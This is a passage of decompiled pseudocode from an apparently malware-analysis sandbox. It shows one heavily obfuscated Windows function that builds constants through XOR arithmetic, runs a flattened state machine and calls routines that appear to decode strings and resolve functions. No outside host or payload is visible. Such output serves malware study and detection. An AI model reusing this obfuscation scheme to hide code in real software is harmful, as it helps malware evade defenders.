                                                                                                                                  				signed int _v124;
                                                                                                                                  				signed int _v128;
                                                                                                                                  				signed int _v132;
                                                                                                                                  				signed int _v136;
                                                                                                                                  				signed int _v140;
                                                                                                                                  				signed int _v144;
                                                                                                                                  				signed int _v148;
                                                                                                                                  				signed int _v152;
                                                                                                                                  				signed int _v156;
                                                                                                                                  				signed int _v160;
                                                                                                                                  				signed int _v164;
                                                                                                                                  				signed int _v168;
                                                                                                                                  				signed int _v172;
                                                                                                                                  				signed int _v176;
                                                                                                                                  				signed int _v180;
                                                                                                                                  				signed int _v184;
                                                                                                                                  				unsigned int _v188;
                                                                                                                                  				signed int _v192;
                                                                                                                                  				signed int _v196;
                                                                                                                                  				signed int _v200;
                                                                                                                                  				signed int _v204;
                                                                                                                                  				signed int _v208;
                                                                                                                                  				signed int _v212;
                                                                                                                                  				signed int _v216;
                                                                                                                                  				signed int _v220;
                                                                                                                                  				signed int _v224;
                                                                                                                                  				signed int _v228;
                                                                                                                                  				signed int _v232;
                                                                                                                                  				signed int _v236;
                                                                                                                                  				signed int _v240;
                                                                                                                                  				signed int _v244;
                                                                                                                                  				signed int _v248;
                                                                                                                                  				signed int _v252;
                                                                                                                                  				signed int _v256;
                                                                                                                                  				signed int _v260;
                                                                                                                                  				signed int _v264;
                                                                                                                                  				signed int _v268;
                                                                                                                                  				signed int _v272;
                                                                                                                                  				signed int _v276;
                                                                                                                                  				signed int _v280;
                                                                                                                                  				signed int _v284;
                                                                                                                                  				signed int _v288;
                                                                                                                                  				signed int _v292;
                                                                                                                                  				signed int _v296;
                                                                                                                                  				signed int _v300;
                                                                                                                                  				signed int _v304;
                                                                                                                                  				signed int _v308;
                                                                                                                                  				signed int _v312;
                                                                                                                                  				signed int _v316;
                                                                                                                                  				signed int _v320;
                                                                                                                                  				signed int _v324;
                                                                                                                                  				signed int _v328;
                                                                                                                                  				signed int _v332;
                                                                                                                                  				signed int _v336;
                                                                                                                                  				signed int _v340;
                                                                                                                                  				signed int _v344;
                                                                                                                                  				signed int _v348;
                                                                                                                                  				signed int _v352;
                                                                                                                                  				signed int _v356;
                                                                                                                                  				signed int _v360;
                                                                                                                                  				signed int _v364;
                                                                                                                                  				signed int _v368;
                                                                                                                                  				signed int _v372;
                                                                                                                                  				signed int _v376;
                                                                                                                                  				signed int _v380;
                                                                                                                                  				signed int _v384;
                                                                                                                                  				signed int _v388;
                                                                                                                                  				signed int _v392;
                                                                                                                                  				signed int _v396;
                                                                                                                                  				void* _t716;
                                                                                                                                  				void* _t717;
                                                                                                                                  				void* _t718;
                                                                                                                                  				intOrPtr _t730;
                                                                                                                                  				intOrPtr _t732;
                                                                                                                                  				void* _t733;
                                                                                                                                  				signed int _t735;
                                                                                                                                  				void* _t741;
                                                                                                                                  				intOrPtr _t746;
                                                                                                                                  				intOrPtr _t752;
                                                                                                                                  				intOrPtr _t754;
                                                                                                                                  				intOrPtr _t755;
                                                                                                                                  				void* _t757;
                                                                                                                                  				void* _t759;
                                                                                                                                  				intOrPtr _t760;
                                                                                                                                  				void* _t766;
                                                                                                                                  				signed int _t772;
                                                                                                                                  				signed int _t773;
                                                                                                                                  				signed int _t774;
                                                                                                                                  				signed int _t775;
                                                                                                                                  				signed int _t776;
                                                                                                                                  				signed int _t777;
                                                                                                                                  				signed int _t778;
                                                                                                                                  				signed int _t779;
                                                                                                                                  				signed int _t780;
                                                                                                                                  				signed int _t781;
                                                                                                                                  				signed int _t782;
                                                                                                                                  				void* _t783;
                                                                                                                                  				intOrPtr _t792;
                                                                                                                                  				void* _t807;
                                                                                                                                  				void* _t812;
                                                                                                                                  				void* _t842;
                                                                                                                                  				intOrPtr _t848;
                                                                                                                                  				void* _t864;
                                                                                                                                  				intOrPtr _t866;
                                                                                                                                  				signed int _t867;
                                                                                                                                  				void* _t868;
                                                                                                                                  				void* _t873;
                                                                                                                                  				signed int* _t875;
                                                                                                                                  				void* _t878;
                                                                                                                                  
                                                                                                                                  				_t875 =  &_v396;
                                                                                                                                  				_v56 = 0xa0cd19;
                                                                                                                                  				_t873 = 0;
                                                                                                                                  				_v84 = __ecx;
                                                                                                                                  				_v52 = _v52 & 0;
                                                                                                                                  				_t766 = 0x41de8e2;
                                                                                                                                  				_v48 = _v48 & 0;
                                                                                                                                  				_v300 = 0x1109eb;
                                                                                                                                  				_v300 = _v300 + 0xcb;
                                                                                                                                  				_v300 = _v300 | 0xecff95c2;
                                                                                                                                  				_v300 = _v300 ^ 0xa1bddbbd;
                                                                                                                                  				_v252 = 0xe28eec;
                                                                                                                                  				_v252 = _v252 + 0x19d6;
                                                                                                                                  				_v252 = _v252 | 0xcaf404bd;
                                                                                                                                  				_v252 = _v252 ^ 0xcaf6acfe;
                                                                                                                                  				_v124 = 0x517500;
                                                                                                                                  				_v124 = _v124 + 0x84ec;
                                                                                                                                  				_v124 = _v124 ^ 0x0051f9ec;
                                                                                                                                  				_v344 = 0xbde49;
                                                                                                                                  				_t772 = 0x31;
                                                                                                                                  				_v344 = _v344 * 0x35;
                                                                                                                                  				_v344 = _v344 << 9;
                                                                                                                                  				_v344 = _v344 + 0x7afe;
                                                                                                                                  				_v344 = _v344 ^ 0xea0ab4fe;
                                                                                                                                  				_v232 = 0xd06c4e;
                                                                                                                                  				_v232 = _v232 | 0x98bd8447;
                                                                                                                                  				_v232 = _v232 + 0xffff492f;
                                                                                                                                  				_v232 = _v232 ^ 0x98fd357e;
                                                                                                                                  				_v236 = 0xf2a19d;
                                                                                                                                  				_v236 = _v236 << 8;
                                                                                                                                  				_v236 = _v236 | 0xeb063d66;
                                                                                                                                  				_v236 = _v236 ^ 0xfba7bd66;
                                                                                                                                  				_v304 = 0x7cba75;
                                                                                                                                  				_v304 = _v304 << 0x10;
                                                                                                                                  				_v304 = _v304 >> 0xd;
                                                                                                                                  				_v304 = _v304 ^ 0x0005d3a8;
                                                                                                                                  				_v220 = 0xced2db;
                                                                                                                                  				_v220 = _v220 >> 0xb;
                                                                                                                                  				_v220 = _v220 * 0x6a;
                                                                                                                                  				_v220 = _v220 ^ 0x000ab444;
                                                                                                                                  				_v356 = 0x98a5e4;
                                                                                                                                  				_v356 = _v356 ^ 0xdd9204f6;
                                                                                                                                  				_v356 = _v356 | 0x4689a95f;
                                                                                                                                  				_v356 = _v356 * 0x48;
                                                                                                                                  				_v356 = _v356 ^ 0xdf47a2b8;
                                                                                                                                  				_v292 = 0x99ac6b;
                                                                                                                                  				_v292 = _v292 * 0x35;
                                                                                                                                  				_v292 = _v292 / _t772;
                                                                                                                                  				_v292 = _v292 ^ 0x00a637e1;
                                                                                                                                  				_v348 = 0x8d86f8;
                                                                                                                                  				_v348 = _v348 + 0x9ec9;
                                                                                                                                  				_v348 = _v348 + 0xfffff441;
                                                                                                                                  				_v348 = _v348 * 0x3a;
                                                                                                                                  				_v348 = _v348 ^ 0x2031e474;
                                                                                                                                  				_v208 = 0x39dd97;
                                                                                                                                  				_v208 = _v208 << 0x10;
                                                                                                                                  				_v208 = _v208 + 0x9a19;
                                                                                                                                  				_v208 = _v208 ^ 0xdd979a19;
                                                                                                                                  				_v100 = 0xd2197;
                                                                                                                                  				_v100 = _v100 + 0x97e4;
                                                                                                                                  				_v100 = _v100 ^ 0x000db95b;
                                                                                                                                  				_v324 = 0x771ce;
                                                                                                                                  				_v324 = _v324 << 1;
                                                                                                                                  				_v324 = _v324 ^ 0x580a954c;
                                                                                                                                  				_v324 = _v324 ^ 0x580cba62;
                                                                                                                                  				_v352 = 0xd79a55;
                                                                                                                                  				_t867 = 0x4d;
                                                                                                                                  				_v352 = _v352 / _t867;
                                                                                                                                  				_v352 = _v352 << 5;
                                                                                                                                  				_v352 = _v352 + 0xffffa0ed;
                                                                                                                                  				_v352 = _v352 ^ 0x005b1fb1;
                                                                                                                                  				_v264 = 0xbc6795;
                                                                                                                                  				_v264 = _v264 + 0x99f5;
                                                                                                                                  				_v264 = _v264 | 0xde86e00c;
                                                                                                                                  				_v264 = _v264 ^ 0xdeb9ffad;
                                                                                                                                  				_v240 = 0x2649df;
                                                                                                                                  				_v240 = _v240 + 0x8f57;
                                                                                                                                  				_v240 = _v240 + 0xffffdcf3;
                                                                                                                                  				_v240 = _v240 ^ 0x002859eb;
                                                                                                                                  				_v180 = 0x284ff;
                                                                                                                                  				_v180 = _v180 + 0xfffffbe4;
                                                                                                                                  				_v180 = _v180 ^ 0x0004b053;
                                                                                                                                  				_v248 = 0x43d81c;
                                                                                                                                  				_t773 = 0x2c;
                                                                                                                                  				_v248 = _v248 * 0x30;
                                                                                                                                  				_v248 = _v248 + 0x77f1;
                                                                                                                                  				_v248 = _v248 ^ 0x0cb65cea;
                                                                                                                                  				_v164 = 0x561af9;
                                                                                                                                  				_v164 = _v164 * 0x5f;
                                                                                                                                  				_v164 = _v164 ^ 0x1ff767f2;
                                                                                                                                  				_v172 = 0x424117;
                                                                                                                                  				_v172 = _v172 / _t773;
                                                                                                                                  				_v172 = _v172 ^ 0x000edcdb;
                                                                                                                                  				_v336 = 0xedf003;
                                                                                                                                  				_v336 = _v336 + 0xffff11da;
                                                                                                                                  				_v336 = _v336 >> 2;
                                                                                                                                  				_v336 = _v336 >> 9;
                                                                                                                                  				_v336 = _v336 ^ 0x000c05d4;
                                                                                                                                  				_v216 = 0xec53cc;
                                                                                                                                  				_v216 = _v216 | 0x30e2710b;
                                                                                                                                  				_v216 = _v216 * 0x1f;
                                                                                                                                  				_v216 = _v216 ^ 0xeced0588;
                                                                                                                                  				_v224 = 0xc36dcc;
                                                                                                                                  				_v224 = _v224 * 0x64;
                                                                                                                                  				_v224 = _v224 * 0xc;
                                                                                                                                  				_v224 = _v224 ^ 0x9413d5fd;
                                                                                                                                  				_v148 = 0x5fde01;
                                                                                                                                  				_v148 = _v148 ^ 0x51967584;
                                                                                                                                  				_v148 = _v148 ^ 0x51c7dbee;
                                                                                                                                  				_v156 = 0x26546c;
                                                                                                                                  				_v156 = _v156 ^ 0x8ec08bcd;
                                                                                                                                  				_v156 = _v156 ^ 0x8eeee361;
                                                                                                                                  				_v396 = 0x210674;
                                                                                                                                  				_v396 = _v396 ^ 0xb585172f;
                                                                                                                                  				_v396 = _v396 >> 9;
                                                                                                                                  				_v396 = _v396 ^ 0x5fa8c9ed;
                                                                                                                                  				_v396 = _v396 ^ 0x5ff25ba7;
                                                                                                                                  				_v112 = 0xa4fdb5;
                                                                                                                                  				_v112 = _v112 ^ 0x7ac22777;
                                                                                                                                  				_v112 = _v112 ^ 0x7a606cfd;
                                                                                                                                  				_v160 = 0x7fe066;
                                                                                                                                  				_v160 = _v160 | 0xe6d7910f;
                                                                                                                                  				_v160 = _v160 ^ 0xe6fe40a3;
                                                                                                                                  				_v152 = 0xb045a1;
                                                                                                                                  				_v152 = _v152 ^ 0x0733bf74;
                                                                                                                                  				_v152 = _v152 ^ 0x078d93a6;
                                                                                                                                  				_v384 = 0x7bd524;
                                                                                                                                  				_v384 = _v384 + 0xffff236c;
                                                                                                                                  				_v384 = _v384 * 0x7b;
                                                                                                                                  				_v384 = _v384 + 0xffffb98b;
                                                                                                                                  				_v384 = _v384 ^ 0x3b1735e1;
                                                                                                                                  				_v392 = 0x61d9a1;
                                                                                                                                  				_v392 = _v392 + 0xab93;
                                                                                                                                  				_v392 = _v392 + 0xffff054c;
                                                                                                                                  				_v392 = _v392 | 0xc62dc39c;
                                                                                                                                  				_v392 = _v392 ^ 0xc661791a;
                                                                                                                                  				_v376 = 0x1528d1;
                                                                                                                                  				_v376 = _v376 << 8;
                                                                                                                                  				_v376 = _v376 + 0xffff31a1;
                                                                                                                                  				_v376 = _v376 >> 9;
                                                                                                                                  				_v376 = _v376 ^ 0x000f3b72;
                                                                                                                                  				_v268 = 0x199e3d;
                                                                                                                                  				_v268 = _v268 ^ 0x3c18ecc0;
                                                                                                                                  				_v268 = _v268 >> 0xf;
                                                                                                                                  				_v268 = _v268 ^ 0x00085298;
                                                                                                                                  				_v116 = 0x9d324d;
                                                                                                                                  				_t774 = 0x5b;
                                                                                                                                  				_v116 = _v116 * 0x35;
                                                                                                                                  				_v116 = _v116 ^ 0x2088a224;
                                                                                                                                  				_v144 = 0xea008e;
                                                                                                                                  				_v144 = _v144 * 0x31;
                                                                                                                                  				_v144 = _v144 ^ 0x2cc3d943;
                                                                                                                                  				_v200 = 0xbe23d7;
                                                                                                                                  				_v200 = _v200 / _t774;
                                                                                                                                  				_v200 = _v200 ^ 0x0006a720;
                                                                                                                                  				_v368 = 0xbc3a01;
                                                                                                                                  				_v368 = _v368 >> 2;
                                                                                                                                  				_v368 = _v368 << 1;
                                                                                                                                  				_v368 = _v368 | 0x91e27348;
                                                                                                                                  				_v368 = _v368 ^ 0x91f48308;
                                                                                                                                  				_v312 = 0x81ba05;
                                                                                                                                  				_v312 = _v312 ^ 0x6d6d273d;
                                                                                                                                  				_v312 = _v312 + 0x9af1;
                                                                                                                                  				_v312 = _v312 ^ 0x6ded9aad;
                                                                                                                                  				_v320 = 0xa9a2ca;
                                                                                                                                  				_v320 = _v320 / _t867;
                                                                                                                                  				_t775 = 0x39;
                                                                                                                                  				_v320 = _v320 / _t775;
                                                                                                                                  				_v320 = _v320 ^ 0x0005ef3e;
                                                                                                                                  				_v136 = 0x8e55db;
                                                                                                                                  				_t776 = 0xb;
                                                                                                                                  				_v136 = _v136 / _t776;
                                                                                                                                  				_v136 = _v136 ^ 0x00010f6d;
                                                                                                                                  				_v296 = 0x9a02a3;
                                                                                                                                  				_v296 = _v296 | 0xc0bbeea6;
                                                                                                                                  				_v296 = _v296 ^ 0xfebfff47;
                                                                                                                                  				_v296 = _v296 ^ 0x3e0de8e7;
                                                                                                                                  				_v196 = 0x628794;
                                                                                                                                  				_v196 = _v196 >> 7;
                                                                                                                                  				_v196 = _v196 ^ 0x00033c53;
                                                                                                                                  				_v360 = 0xc75687;
                                                                                                                                  				_t777 = 0x55;
                                                                                                                                  				_v360 = _v360 / _t777;
                                                                                                                                  				_t778 = 0x4a;
                                                                                                                                  				_v360 = _v360 / _t778;
                                                                                                                                  				_t779 = 0x66;
                                                                                                                                  				_v360 = _v360 / _t779;
                                                                                                                                  				_v360 = _v360 ^ 0x0006bc1c;
                                                                                                                                  				_v288 = 0xb89ddb;
                                                                                                                                  				_t780 = 0x5c;
                                                                                                                                  				_v288 = _v288 * 0x7b;
                                                                                                                                  				_v288 = _v288 + 0x220a;
                                                                                                                                  				_v288 = _v288 ^ 0x58b2320e;
                                                                                                                                  				_v108 = 0x352a49;
                                                                                                                                  				_v108 = _v108 | 0x42677ea4;
                                                                                                                                  				_v108 = _v108 ^ 0x427d3f06;
                                                                                                                                  				_v332 = 0x1123f9;
                                                                                                                                  				_v332 = _v332 + 0xfffffbdd;
                                                                                                                                  				_v332 = _v332 + 0xffff8b7f;
                                                                                                                                  				_v332 = _v332 | 0xcf6269e1;
                                                                                                                                  				_v332 = _v332 ^ 0xcf7a63e7;
                                                                                                                                  				_v192 = 0x15ba5c;
                                                                                                                                  				_v192 = _v192 + 0xffff7d63;
                                                                                                                                  				_v192 = _v192 ^ 0x0011de47;
                                                                                                                                  				_v204 = 0xd88287;
                                                                                                                                  				_v204 = _v204 >> 1;
                                                                                                                                  				_v204 = _v204 ^ 0x006fcfd9;
                                                                                                                                  				_v308 = 0x394063;
                                                                                                                                  				_v308 = _v308 | 0x23438f89;
                                                                                                                                  				_v308 = _v308 ^ 0x95557e79;
                                                                                                                                  				_v308 = _v308 ^ 0xb625da34;
                                                                                                                                  				_v260 = 0x6632ca;
                                                                                                                                  				_v260 = _v260 << 0xc;
                                                                                                                                  				_v260 = _v260 / _t780;
                                                                                                                                  				_v260 = _v260 ^ 0x011a1b64;
                                                                                                                                  				_v316 = 0x1ead1d;
                                                                                                                                  				_v316 = _v316 >> 0xf;
                                                                                                                                  				_v316 = _v316 << 0xe;
                                                                                                                                  				_v316 = _v316 ^ 0x000acc6a;
                                                                                                                                  				_v388 = 0xc01c7d;
                                                                                                                                  				_v388 = _v388 >> 9;
                                                                                                                                  				_v388 = _v388 | 0xa159bc3f;
                                                                                                                                  				_v388 = _v388 ^ 0x1058b9c4;
                                                                                                                                  				_v388 = _v388 ^ 0xb10bd724;
                                                                                                                                  				_v256 = 0x2459a9;
                                                                                                                                  				_v256 = _v256 + 0xffff58c0;
                                                                                                                                  				_v256 = _v256 >> 0xc;
                                                                                                                                  				_v256 = _v256 ^ 0x000386a3;
                                                                                                                                  				_v340 = 0xa38d0b;
                                                                                                                                  				_t781 = 0x78;
                                                                                                                                  				_v340 = _v340 / _t781;
                                                                                                                                  				_v340 = _v340 ^ 0x3e3bd45c;
                                                                                                                                  				_v340 = _v340 + 0xf3c0;
                                                                                                                                  				_v340 = _v340 ^ 0x3e3a819a;
                                                                                                                                  				_v380 = 0x2dd945;
                                                                                                                                  				_v380 = _v380 << 4;
                                                                                                                                  				_v380 = _v380 + 0xffffb7c2;
                                                                                                                                  				_v380 = _v380 << 6;
                                                                                                                                  				_v380 = _v380 ^ 0xb75574a7;
                                                                                                                                  				_v272 = 0xf6939e;
                                                                                                                                  				_v272 = _v272 | 0x851c2f86;
                                                                                                                                  				_v272 = _v272 + 0xffff0412;
                                                                                                                                  				_v272 = _v272 ^ 0x85fd1a3b;
                                                                                                                                  				_v188 = 0x2c17e;
                                                                                                                                  				_v188 = _v188 >> 3;
                                                                                                                                  				_v188 = _v188 ^ 0x000c5ae0;
                                                                                                                                  				_v280 = 0xf08b81;
                                                                                                                                  				_v280 = _v280 | 0x75266007;
                                                                                                                                  				_v280 = _v280 ^ 0xc75f894a;
                                                                                                                                  				_v280 = _v280 ^ 0xb2a4e63e;
                                                                                                                                  				_v372 = 0x6f48a0;
                                                                                                                                  				_v372 = _v372 << 0xa;
                                                                                                                                  				_v372 = _v372 >> 0x10;
                                                                                                                                  				_v372 = _v372 | 0x5e122b7b;
                                                                                                                                  				_v372 = _v372 ^ 0x5e16ce05;
                                                                                                                                  				_v184 = 0x747075;
                                                                                                                                  				_v184 = _v184 + 0xcea0;
                                                                                                                                  				_v184 = _v184 ^ 0x007a5d3b;
                                                                                                                                  				_v128 = 0x4ebeca;
                                                                                                                                  				_v128 = _v128 + 0xffffee54;
                                                                                                                                  				_v128 = _v128 ^ 0x004a846f;
                                                                                                                                  				_v120 = 0xe78fe5;
                                                                                                                                  				_t868 = 0x80c65ec;
                                                                                                                                  				_v120 = _v120 + 0xffff4f7b;
                                                                                                                                  				_t864 = 0xf9e92c1;
                                                                                                                                  				_v120 = _v120 ^ 0x00e2ece2;
                                                                                                                                  				_v276 = 0xe2917e;
                                                                                                                                  				_v276 = _v276 << 6;
                                                                                                                                  				_v276 = _v276 + 0xffff0dfb;
                                                                                                                                  				_v276 = _v276 ^ 0x38a72339;
                                                                                                                                  				_v176 = 0x1ec236;
                                                                                                                                  				_v176 = _v176 ^ 0x7af5486d;
                                                                                                                                  				_v176 = _v176 ^ 0x7aeb8f45;
                                                                                                                                  				_v244 = 0x4d92e1;
                                                                                                                                  				_t782 = 0x5f;
                                                                                                                                  				_v88 = 0x20;
                                                                                                                                  				_v244 = _v244 * 0x4a;
                                                                                                                                  				_v244 = _v244 | 0x7c3f7c28;
                                                                                                                                  				_v244 = _v244 ^ 0x7e7c1ac2;
                                                                                                                                  				_v284 = 0xc8aa60;
                                                                                                                                  				_v284 = _v284 + 0x32b9;
                                                                                                                                  				_v284 = _v284 + 0xffff127a;
                                                                                                                                  				_v284 = _v284 ^ 0x00c1b775;
                                                                                                                                  				_v228 = 0x32f957;
                                                                                                                                  				_v228 = _v228 << 0xa;
                                                                                                                                  				_v228 = _v228 ^ 0xe304a089;
                                                                                                                                  				_v228 = _v228 ^ 0x28edcf32;
                                                                                                                                  				_v364 = 0x1a55e7;
                                                                                                                                  				_v364 = _v364 * 0x68;
                                                                                                                                  				_v364 = _v364 * 0x36;
                                                                                                                                  				_v364 = _v364 ^ 0xa842ca33;
                                                                                                                                  				_v364 = _v364 ^ 0xe9f59c27;
                                                                                                                                  				_v168 = 0x34b570;
                                                                                                                                  				_v168 = _v168 | 0x6b6928c5;
                                                                                                                                  				_v168 = _v168 ^ 0x6b739674;
                                                                                                                                  				_v104 = 0x8a8082;
                                                                                                                                  				_v104 = _v104 * 0x3f;
                                                                                                                                  				_v104 = _v104 ^ 0x2214377a;
                                                                                                                                  				_v212 = 0x18307b;
                                                                                                                                  				_v212 = _v212 ^ 0x4b6e1055;
                                                                                                                                  				_v212 = _v212 ^ 0x41119872;
                                                                                                                                  				_v212 = _v212 ^ 0x0a6c434c;
                                                                                                                                  				_v132 = 0x8b3f3c;
                                                                                                                                  				_v132 = _v132 << 2;
                                                                                                                                  				_v132 = _v132 ^ 0x022c35f2;
                                                                                                                                  				_v328 = 0x314aa5;
                                                                                                                                  				_v328 = _v328 | 0xbabb419f;
                                                                                                                                  				_v328 = _v328 / _t782;
                                                                                                                                  				_v328 = _v328 + 0xe73f;
                                                                                                                                  				_v328 = _v328 ^ 0x01f1132e;
                                                                                                                                  				_v140 = 0x403514;
                                                                                                                                  				_v140 = _v140 + 0xffff4e06;
                                                                                                                                  				_v140 = _v140 ^ 0x0039264a;
                                                                                                                                  				while(1) {
                                                                                                                                  					L1:
                                                                                                                                  					_t783 = 0xf0ee26a;
                                                                                                                                  					_t842 = 0xbf4f028;
                                                                                                                                  					_t716 = 0xc1f5c56;
                                                                                                                                  					do {
                                                                                                                                  						while(1) {
                                                                                                                                  							L2:
                                                                                                                                  							_t878 = _t766 - _t716;
                                                                                                                                  							if(_t878 > 0) {
                                                                                                                                  								break;
                                                                                                                                  							}
                                                                                                                                  							if(_t878 == 0) {
                                                                                                                                  								_push(_v160);
                                                                                                                                  								_push(_v112);
                                                                                                                                  								_t732 = E002EDCF7(_v396, 0x2d1884, __eflags);
                                                                                                                                  								_push(_v392);
                                                                                                                                  								_t866 = _t732;
                                                                                                                                  								_push(_v384);
                                                                                                                                  								_t733 = E002EDCF7(_v152, 0x2d1924, __eflags);
                                                                                                                                  								_v76 = _v124;
                                                                                                                                  								_t735 = E002DCB52(_v376, _t866, _v268, _v116, _v144);
                                                                                                                                  								_v68 = _v68 & 0x00000000;
                                                                                                                                  								_v72 = _t866;
                                                                                                                                  								_v80 = 2 + _t735 * 2;
                                                                                                                                  								_v60 =  &_v80;
                                                                                                                                  								_v92 = _v88;
                                                                                                                                  								_v64 = 1;
                                                                                                                                  								_t741 = E002D8D13( &_v32, _v200, _v368,  &_v92, _v84, _t733, _v312,  &_v68, _v88, _v320, _v136, _v236);
                                                                                                                                  								_t875 =  &(_t875[0x11]);
                                                                                                                                  								__eflags = _t741 - _v304;
                                                                                                                                  								_t766 = (_t741 == _v304) ? 0xbf4f028 : 0xf9e92c1;
                                                                                                                                  								E002DA8B0(_v296, _t866, _v196);
                                                                                                                                  								E002DA8B0(_v360, _t733, _v288);
                                                                                                                                  								_t864 = 0xf9e92c1;
                                                                                                                                  								goto L24;
                                                                                                                                  							} else {
                                                                                                                                  								if(_t766 == 0xdec32e) {
                                                                                                                                  									_t746 =  *0x2f3dfc; // 0x0
                                                                                                                                  									E002E8519(_v104, _v212,  *((intOrPtr*)(_t746 + 0x50)));
                                                                                                                                  									_t766 = _t864;
                                                                                                                                  									while(1) {
                                                                                                                                  										L1:
                                                                                                                                  										_t783 = 0xf0ee26a;
                                                                                                                                  										_t842 = 0xbf4f028;
                                                                                                                                  										_t716 = 0xc1f5c56;
                                                                                                                                  										goto L2;
                                                                                                                                  									}
                                                                                                                                  								} else {
                                                                                                                                  									if(_t766 == 0x41de8e2) {
                                                                                                                                  										_t766 = 0xe078043;
                                                                                                                                  										continue;
                                                                                                                                  									} else {
                                                                                                                                  										if(_t766 == _t868) {
                                                                                                                                  											_push(_v128);
                                                                                                                                  											_push(_v184);
                                                                                                                                  											_t871 = E002EDCF7(_v372, 0x2d1904, __eflags);
                                                                                                                                  											_t585 =  &_v300; // 0x3e0de8e7
                                                                                                                                  											_v44 =  *_t585;
                                                                                                                                  											_v40 = _v252;
                                                                                                                                  											_pop(_t807);
                                                                                                                                  											_v36 = _v100;
                                                                                                                                  											_t752 =  *0x2f3dfc; // 0x0
                                                                                                                                  											_t754 =  *0x2f3dfc; // 0x0
                                                                                                                                  											_t755 =  *0x2f3dfc; // 0x0
                                                                                                                                  											_t757 = E002ED84C(_t807, _v120, _t755 + 0x64, _v276,  *((intOrPtr*)(_t754 + 0x54)), _v96, _v176, _v244, _v284, _v228, _v292, _t807, _t748,  &_v44,  *((intOrPtr*)(_t752 + 0x50)));
                                                                                                                                  											_t875 =  &(_t875[0xd]);
                                                                                                                                  											__eflags = _t757 - _v348;
                                                                                                                                  											if(_t757 != _v348) {
                                                                                                                                  												_t766 = 0xdec32e;
                                                                                                                                  											} else {
                                                                                                                                  												_t766 = _t864;
                                                                                                                                  												_t873 = 1;
                                                                                                                                  											}
                                                                                                                                  											E002DA8B0(_v364, _t871, _v168);
                                                                                                                                  											goto L24;
                                                                                                                                  										} else {
                                                                                                                                  											_t882 = _t766 - _t842;
                                                                                                                                  											if(_t766 == _t842) {
                                                                                                                                  												_push(_v192);
                                                                                                                                  												_push(_v332);
                                                                                                                                  												_t759 = E002EDCF7(_v108, 0x2d18b4, _t882);
                                                                                                                                  												_pop(_t812);
                                                                                                                                  												_t760 =  *0x2f3dfc; // 0x0
                                                                                                                                  												E002F0B68(_t759,  &_v92, _v220, _v204, _t812, _t760 + 0x54, _v308, _v260, _v316, _v388, _v96, _v256);
                                                                                                                                  												_t766 =  ==  ? 0xf0ee26a : _t864;
                                                                                                                                  												E002DA8B0(_v340, _t759, _v380);
                                                                                                                                  												L23:
                                                                                                                                  												_t875 =  &(_t875[0xb]);
                                                                                                                                  												L24:
                                                                                                                                  												_t842 = 0xbf4f028;
                                                                                                                                  												_t783 = 0xf0ee26a;
                                                                                                                                  												_t868 = 0x80c65ec;
                                                                                                                                  												_t716 = 0xc1f5c56;
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  										goto L25;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							L20:
                                                                                                                                  							return _t873;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _t766 - 0xe078043;
                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                  							_push(_v264);
                                                                                                                                  							_push(_v352);
                                                                                                                                  							_t717 = E002EDCF7(_v324, 0x2d18e4, __eflags);
                                                                                                                                  							_push(_v248);
                                                                                                                                  							_push(_v180);
                                                                                                                                  							_t718 = E002EDCF7(_v240, 0x2d1814, __eflags);
                                                                                                                                  							_t665 =  &_v172; // 0x39264a
                                                                                                                                  							__eflags = E002D9462(_t717,  *_t665,  &_v96, _t718, _v336, _v344) - _v232;
                                                                                                                                  							_t766 =  ==  ? 0xc1f5c56 : 0x1d0239b;
                                                                                                                                  							E002DA8B0(_v216, _t717, _v224);
                                                                                                                                  							E002DA8B0(_v148, _t718, _v156);
                                                                                                                                  							_t864 = 0xf9e92c1;
                                                                                                                                  							goto L23;
                                                                                                                                  						} else {
                                                                                                                                  							__eflags = _t766 - _t783;
                                                                                                                                  							if(_t766 == _t783) {
                                                                                                                                  								_t848 =  *0x2f3dfc; // 0x0
                                                                                                                                  								_push(_t783);
                                                                                                                                  								_push(_t783);
                                                                                                                                  								_t792 = E002D7FF2( *((intOrPtr*)(_t848 + 0x54)));
                                                                                                                                  								_t730 =  *0x2f3dfc; // 0x0
                                                                                                                                  								__eflags = _t792;
                                                                                                                                  								_t766 =  !=  ? _t868 : _t864;
                                                                                                                                  								 *((intOrPtr*)(_t730 + 0x50)) = _t792;
                                                                                                                                  								goto L1;
                                                                                                                                  							} else {
                                                                                                                                  								__eflags = _t766 - _t864;
                                                                                                                                  								if(__eflags != 0) {
                                                                                                                                  									goto L25;
                                                                                                                                  								} else {
                                                                                                                                  									_t646 =  &_v140; // 0x39264a
                                                                                                                                  									E002D957D(_v96, _v132, _v328, _v208,  *_t646);
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						goto L20;
                                                                                                                                  						L25:
                                                                                                                                  					} while (_t766 != 0x1d0239b);
                                                                                                                                  					goto L20;
                                                                                                                                  				}
                                                                                                                                  			}

                                                                                                                                  0x002d314b
                                                                                                                                  0x002d3156
                                                                                                                                  0x002d3169
                                                                                                                                  0x002d3170
                                                                                                                                  0x002d317b
                                                                                                                                  0x002d3191
                                                                                                                                  0x002d3198
                                                                                                                                  0x002d31a3
                                                                                                                                  0x002d31ab
                                                                                                                                  0x002d31b0
                                                                                                                                  0x002d31b4
                                                                                                                                  0x002d31bc
                                                                                                                                  0x002d31c4
                                                                                                                                  0x002d31cc
                                                                                                                                  0x002d31d4
                                                                                                                                  0x002d31dc
                                                                                                                                  0x002d31e4
                                                                                                                                  0x002d31f4
                                                                                                                                  0x002d31fc
                                                                                                                                  0x002d3201
                                                                                                                                  0x002d3207
                                                                                                                                  0x002d320f
                                                                                                                                  0x002d3221
                                                                                                                                  0x002d3226
                                                                                                                                  0x002d322f
                                                                                                                                  0x002d323a
                                                                                                                                  0x002d3242
                                                                                                                                  0x002d324a
                                                                                                                                  0x002d3252
                                                                                                                                  0x002d325a
                                                                                                                                  0x002d3265
                                                                                                                                  0x002d326d
                                                                                                                                  0x002d3278
                                                                                                                                  0x002d3284
                                                                                                                                  0x002d3289
                                                                                                                                  0x002d3293
                                                                                                                                  0x002d3298
                                                                                                                                  0x002d32a2
                                                                                                                                  0x002d32a5
                                                                                                                                  0x002d32a9
                                                                                                                                  0x002d32b1
                                                                                                                                  0x002d32c2
                                                                                                                                  0x002d32c5
                                                                                                                                  0x002d32cc
                                                                                                                                  0x002d32d7
                                                                                                                                  0x002d32e2
